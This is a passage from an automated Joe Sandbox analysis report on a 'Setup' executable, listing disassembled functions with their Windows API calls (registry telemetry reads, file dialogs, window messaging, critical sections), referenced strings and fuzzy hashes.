                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue_vsnwprintfmemset
                                                                                              • String ID: d]l$%s\%s$Software\Microsoft\SQMClient$Software\Policies\Microsoft\SQMClient$StudyId
                                                                                              • API String ID: 908408749-1776563523
                                                                                              • Opcode ID: ae6e23c033e2f88602d234b67d8572ae7b307014e52e7f9370d212c97cfd713a
                                                                                              • Instruction ID: c448c25e8b352762344663eca828d2bc6f2b4b57e00b222e7602f6c6889f2531
                                                                                              • Opcode Fuzzy Hash: ae6e23c033e2f88602d234b67d8572ae7b307014e52e7f9370d212c97cfd713a
                                                                                              • Instruction Fuzzy Hash: 3B310BB1902358BAD710CB9C8C84FEB77ACEF55348F52049AA924D6951C370FD88CF99
                                                                                              Function 63963BC0 Relevance: 9.1, APIs: 6, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 63963BCA
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,00000698,639603E4,00000000), ref: 63963BE0
                                                                                                • Part of subcall function 6395F6DE: __EH_prolog3_GS.LIBCMT ref: 6395F6E8
                                                                                                • Part of subcall function 6395F6DE: _memset.LIBCMT ref: 6395F714
                                                                                                • Part of subcall function 6395F6DE: _memset.LIBCMT ref: 6395F741
                                                                                                • Part of subcall function 6395F6DE: GetVersionExW.KERNEL32 ref: 6395F75A
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 63963C44
                                                                                              • GetSaveFileNameW.COMDLG32(?), ref: 63963C4C
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 63963C73
                                                                                              • _memcpy_s.LIBCMT ref: 63963CE8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectoryFileH_prolog3_Name_memset$OpenSaveVersion_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 133044998-0
                                                                                              • Opcode ID: d30e2f93c4a5ff490e7b5a22fb0af39fa60d86fff0fa530bb4a3839e5c563ff9
                                                                                              • Instruction ID: f1804955050dd90aa353e9a8e83468534592de68f0d06fdca5661cb5d7b9ada3
                                                                                              • Opcode Fuzzy Hash: d30e2f93c4a5ff490e7b5a22fb0af39fa60d86fff0fa530bb4a3839e5c563ff9
                                                                                              • Instruction Fuzzy Hash: 9941B071906218DFEB20DB20CC88B89B7B9BF56714F4041E9E018A71A1CB36DAA0CF50
                                                                                              Function 6C5D81BC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 87COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D81EC
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                                • Part of subcall function 6C5D3E29: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                                • Part of subcall function 6C5D3E29: RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                                • Part of subcall function 6C5D3E29: RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue_vsnwprintfmemset
                                                                                              • String ID: d]l$d]l$%s\%s$CabSessionAfterSize$Software\Microsoft\SQMClient
                                                                                              • API String ID: 908408749-2596333453
                                                                                              • Opcode ID: f8d5043834132f02cf131cd395810f645e73dcff39e015370ab480b6c2309668
                                                                                              • Instruction ID: cf3074ed755ae8c6e0bd18e93db2ee122679fa2fd86b60c0efc2af8b83709143
                                                                                              • Opcode Fuzzy Hash: f8d5043834132f02cf131cd395810f645e73dcff39e015370ab480b6c2309668
                                                                                              • Instruction Fuzzy Hash: 2731F534505308AFDB14CE0DCC85FDA77A9BB84318F660496E925D7952C370ED888F9A
                                                                                              Function 6C5EA55E Relevance: 9.1, APIs: 6, Instructions: 73registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,?), ref: 6C5EA581
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?), ref: 6C5EA5A7
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6C5EA5B9
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,?), ref: 6C5EA5CC
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?), ref: 6C5EA5EB
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6C5EA5FC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 7ac682e0dc46e0febf53556dd6ab469f962ff80b4442477df797bde144a5af77
                                                                                              • Instruction ID: 639e8a583afebb472a8561b65b10950ea5ba39db8afc33e0ab6e9049b651c6e0
                                                                                              • Opcode Fuzzy Hash: 7ac682e0dc46e0febf53556dd6ab469f962ff80b4442477df797bde144a5af77
                                                                                              • Instruction Fuzzy Hash: 6C2123B6900248FBDF11DFA2DD44DCF7FB9EB89324F108162BA14A6010D731DA54EB60
                                                                                              Function 6C5D87B7 Relevance: 9.1, APIs: 6, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 6C5D87CF
                                                                                              • MsgWaitForMultipleObjects.USER32(?,?,00000000,?,000004FF), ref: 6C5D87F9
                                                                                              • GetTickCount.KERNEL32 ref: 6C5D880B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$MultipleObjectsWait
                                                                                              • String ID:
                                                                                              • API String ID: 459475419-0
                                                                                              • Opcode ID: fcf60fa78c012e9a2eca72975cca5bfbbefb59c310f5ffc326e83c7f4afb05e1
                                                                                              • Instruction ID: 280a5f886e6216860644d2d8815488ead630c4eba4f6e6f390ba339aaa339600
                                                                                              • Opcode Fuzzy Hash: fcf60fa78c012e9a2eca72975cca5bfbbefb59c310f5ffc326e83c7f4afb05e1
                                                                                              • Instruction Fuzzy Hash: 5A214C71900249EFCF00DFA9CC84EDE7BB9EB09364F128552EA10E6550C731EA95DBA9
                                                                                              Function 6C5E8C6C Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8CAC
                                                                                              • CloseHandle.KERNEL32(?,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8CC0
                                                                                              • CloseHandle.KERNEL32(?,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8CCD
                                                                                              • CloseHandle.KERNEL32(?,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8CDA
                                                                                              • DeleteCriticalSection.KERNEL32(?,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8CE3
                                                                                              • EnterCriticalSection.KERNEL32(?,00000004,6C5E630E,6C5F0168,?,6C5DF4D9,00000001,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5E8C93
                                                                                                • Part of subcall function 6C5E8958: free.MSVCRT ref: 6C5E8964
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCriticalHandleSection$DeleteEnterLeavefree
                                                                                              • String ID:
                                                                                              • API String ID: 2998865046-0
                                                                                              • Opcode ID: 9bb7c00d6a59f4a6aa82939cebc7a0e8a90bd5e6aca13789d0bb36338a45ba55
                                                                                              • Instruction ID: 750f2ed07a123dcf8bec678bc80579b0f65f294bbf678b8e99c705f683c421ab
                                                                                              • Opcode Fuzzy Hash: 9bb7c00d6a59f4a6aa82939cebc7a0e8a90bd5e6aca13789d0bb36338a45ba55
                                                                                              • Instruction Fuzzy Hash: 111118B0502705CBCB20EFAACD8459AB7F4BF59308751082ED186D7E50DB75F988CB16
                                                                                              Function 63972B64 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __CreateFrameInfo.LIBCMT ref: 63972B8C
                                                                                                • Part of subcall function 63972542: __getptd.LIBCMT ref: 63972550
                                                                                                • Part of subcall function 63972542: __getptd.LIBCMT ref: 6397255E
                                                                                              • __getptd.LIBCMT ref: 63972B96
                                                                                                • Part of subcall function 63969BE0: __getptd_noexit.LIBCMT ref: 63969BE3
                                                                                                • Part of subcall function 63969BE0: __amsg_exit.LIBCMT ref: 63969BF0
                                                                                              • __getptd.LIBCMT ref: 63972BA4
                                                                                              • __getptd.LIBCMT ref: 63972BB2
                                                                                              • __getptd.LIBCMT ref: 63972BBD
                                                                                              • _CallCatchBlock2.LIBCMT ref: 63972BE3
                                                                                                • Part of subcall function 639725F6: __CallSettingFrame@12.LIBCMT ref: 63972642
                                                                                                • Part of subcall function 63972C8A: __getptd.LIBCMT ref: 63972C99
                                                                                                • Part of subcall function 63972C8A: __getptd.LIBCMT ref: 63972CA7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                              • String ID:
                                                                                              • API String ID: 1602911419-0
                                                                                              • Opcode ID: 040182913ab5de98d4dce59afaca3a70b7968be2db1773c273ac280849929d72
                                                                                              • Instruction ID: 9c1394e14e9519593cafc61dd97b0bda55c1ff84ffc63a416d129727c82e7a37
                                                                                              • Opcode Fuzzy Hash: 040182913ab5de98d4dce59afaca3a70b7968be2db1773c273ac280849929d72
                                                                                              • Instruction Fuzzy Hash: 3A1107B5C1530ADFEB00DFA4C944BAEBBB0FF15754F108069E854A7250DB389A11DF90
                                                                                              Function 6396424A Relevance: 9.0, APIs: 6, Instructions: 49windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63964251
                                                                                              • SetWindowLongW.USER32(?,000000F4,00000069), ref: 63964265
                                                                                                • Part of subcall function 6394FF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                              • GetParent.USER32(?), ref: 639642A1
                                                                                              • SendMessageW.USER32(00000000,00000485,00000000,00000069), ref: 639642AC
                                                                                              • GetParent.USER32(?), ref: 639642B9
                                                                                              • GetDesktopWindow.USER32 ref: 639642BE
                                                                                                • Part of subcall function 63968E26: HeapFree.KERNEL32(00000000,00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E3C
                                                                                                • Part of subcall function 63968E26: GetLastError.KERNEL32(00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1093383602-0
                                                                                              • Opcode ID: a6ebe9de4f26a2b86282e5b72dac04022ea02fd7e7ed7c6b9c8c7512852fd6e5
                                                                                              • Instruction ID: a39ec2e0998b255661f4ad1714907740d87353214291cac652ae6b9055b0b046
                                                                                              • Opcode Fuzzy Hash: a6ebe9de4f26a2b86282e5b72dac04022ea02fd7e7ed7c6b9c8c7512852fd6e5
                                                                                              • Instruction Fuzzy Hash: 00111874900308DFDF20AFA9C94499EBBF8BF5AB04B10451AE126EB2A0DB71D910CF50
                                                                                              Function 63963A76 Relevance: 9.0, APIs: 6, Instructions: 49windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63963A7D
                                                                                              • SetWindowLongW.USER32(?,000000F4,0000006B), ref: 63963A91
                                                                                                • Part of subcall function 6394FF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                              • GetParent.USER32(?), ref: 63963ACD
                                                                                              • SendMessageW.USER32(00000000,00000485,00000000,0000006B), ref: 63963AD8
                                                                                              • GetParent.USER32(?), ref: 63963AE5
                                                                                              • GetDesktopWindow.USER32 ref: 63963AEA
                                                                                                • Part of subcall function 63968E26: HeapFree.KERNEL32(00000000,00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E3C
                                                                                                • Part of subcall function 63968E26: GetLastError.KERNEL32(00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1093383602-0
                                                                                              • Opcode ID: 95af4ff55f6d7a7b2d59f19c133c1d84735e43af08f9bcd8030d9938ce443491
                                                                                              • Instruction ID: 6b25dc754c33decd24fa88492e277dd6b36f84d50a184d394dbc04bcd0331d56
                                                                                              • Opcode Fuzzy Hash: 95af4ff55f6d7a7b2d59f19c133c1d84735e43af08f9bcd8030d9938ce443491
                                                                                              • Instruction Fuzzy Hash: 41111870900704DFDB20EFA9CD8499EBBF4BF5AB04B10451AE126EB2A0DB71D910CF54
                                                                                              Function 63964100 Relevance: 9.0, APIs: 6, Instructions: 49windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63964107
                                                                                              • SetWindowLongW.USER32(?,000000F4,0000006A), ref: 6396411B
                                                                                                • Part of subcall function 6394FF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                              • GetParent.USER32(?), ref: 63964157
                                                                                              • SendMessageW.USER32(00000000,00000485,00000000,0000006A), ref: 63964162
                                                                                              • GetParent.USER32(?), ref: 6396416F
                                                                                              • GetDesktopWindow.USER32 ref: 63964174
                                                                                                • Part of subcall function 63968E26: HeapFree.KERNEL32(00000000,00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E3C
                                                                                                • Part of subcall function 63968E26: GetLastError.KERNEL32(00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1093383602-0
                                                                                              • Opcode ID: 618507b14a1ce9565b7e36fbefd0475689d7223784afee1453b562edae93d3e8
                                                                                              • Instruction ID: c42adb19be6ba8230251e46b6a8dcf4ac93a292687e12a442f040d0b3654a854
                                                                                              • Opcode Fuzzy Hash: 618507b14a1ce9565b7e36fbefd0475689d7223784afee1453b562edae93d3e8
                                                                                              • Instruction Fuzzy Hash: A0111C70A00304DFDB10EFA5C94499EBBF4BF6AB04B10451AE115EB290DB71D910CF50
                                                                                              Function 63963FCE Relevance: 9.0, APIs: 6, Instructions: 49windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63963FD5
                                                                                              • SetWindowLongW.USER32(?,000000F4,00000067), ref: 63963FE9
                                                                                                • Part of subcall function 6394FF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                              • GetParent.USER32(?), ref: 63964025
                                                                                              • SendMessageW.USER32(00000000,00000485,00000000,00000067), ref: 63964030
                                                                                              • GetParent.USER32(?), ref: 6396403D
                                                                                              • GetDesktopWindow.USER32 ref: 63964042
                                                                                                • Part of subcall function 63968E26: HeapFree.KERNEL32(00000000,00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E3C
                                                                                                • Part of subcall function 63968E26: GetLastError.KERNEL32(00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1093383602-0
                                                                                              • Opcode ID: 6330122ec530170bcf586867f5a1dec837a904a1d701a80df92dbdb68c47232e
                                                                                              • Instruction ID: aa80370ac0b2201d360a5f9e286a0edf7810b58a1ff9c9f99ff8fd12f788f8de
                                                                                              • Opcode Fuzzy Hash: 6330122ec530170bcf586867f5a1dec837a904a1d701a80df92dbdb68c47232e
                                                                                              • Instruction Fuzzy Hash: 33111870904704DFDB20AFA9C94499EBBF4FF5AB04B10451AE165EB2A1DB71D910CF50
                                                                                              Function 6C5D1E75 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(6C5F0168,00000000,6C5D1E21,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D1E8E
                                                                                              • ctype.LIBCPMT ref: 6C5D1EA0
                                                                                              • LeaveCriticalSection.KERNEL32(6C5F0168,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D1EC2
                                                                                              • DeleteCriticalSection.KERNEL32(6C5F0168,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D1EC9
                                                                                              • SetLastError.KERNEL32(1000010A,6C5D1E21,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5DF4C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$DeleteEnterErrorLastLeavectype
                                                                                              • String ID:
                                                                                              • API String ID: 1588575130-0
                                                                                              • Opcode ID: 7be7cb3d2f2c5a0fbd908482607af03c6859b182833dc70c78b96ef5c5c61388
                                                                                              • Instruction ID: 4527aa2b6f18e0afcb1404f51a0d5dcdc281482b72db177bf8d0b2efcefe8abe
                                                                                              • Opcode Fuzzy Hash: 7be7cb3d2f2c5a0fbd908482607af03c6859b182833dc70c78b96ef5c5c61388
                                                                                              • Instruction Fuzzy Hash: 5E0192303123509FDF089B25EC04F9B3674AB8632AF8B0009E025C5991C775E4858F5C
                                                                                              Function 6C5DC385 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,6C5F0088,?,00000000), ref: 6C5E3335
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 6C5E3351
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$ErrorFileLastSystem
                                                                                              • String ID: If-Modified-Since:%s
                                                                                              • API String ID: 2781989572-880471301
                                                                                              • Opcode ID: 155e3dfecf7ce882a05513eeb972c559018a813454088d31fc4cc1655a8f5ddd
                                                                                              • Instruction ID: 4069d88561777c0e4443af403a479e61599dd160589be995cee67bb4a4b30a80
                                                                                              • Opcode Fuzzy Hash: 155e3dfecf7ce882a05513eeb972c559018a813454088d31fc4cc1655a8f5ddd
                                                                                              • Instruction Fuzzy Hash: D951F232A403489BCB04EE59CC88FDBB7B8FB8C304F560599E525DBA60DB30E944CB54
                                                                                              Function 6C5DB5FC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LocalFree.KERNEL32(?,?), ref: 6C5DB6DB
                                                                                                • Part of subcall function 6C5D3679: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,6C5D332F,?), ref: 6C5D3683
                                                                                                • Part of subcall function 6C5D3679: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,6C5D332F,?), ref: 6C5D36B3
                                                                                                • Part of subcall function 6C5D3679: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 6C5D36D5
                                                                                                • Part of subcall function 6C5D3679: CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D36E0
                                                                                                • Part of subcall function 6C5D1967: malloc.MSVCRT(?,6C5F0554), ref: 6C5D1979
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,?,00000000), ref: 6C5DB6BD
                                                                                              Strings
                                                                                              • O:%sD:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GA;;;%s), xrefs: 6C5DB686
                                                                                              • O:%sD:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA), xrefs: 6C5DFDB8
                                                                                              • (A;OICI;GA;;;LS), xrefs: 6C5DB6A2
                                                                                              Memory Dump Source
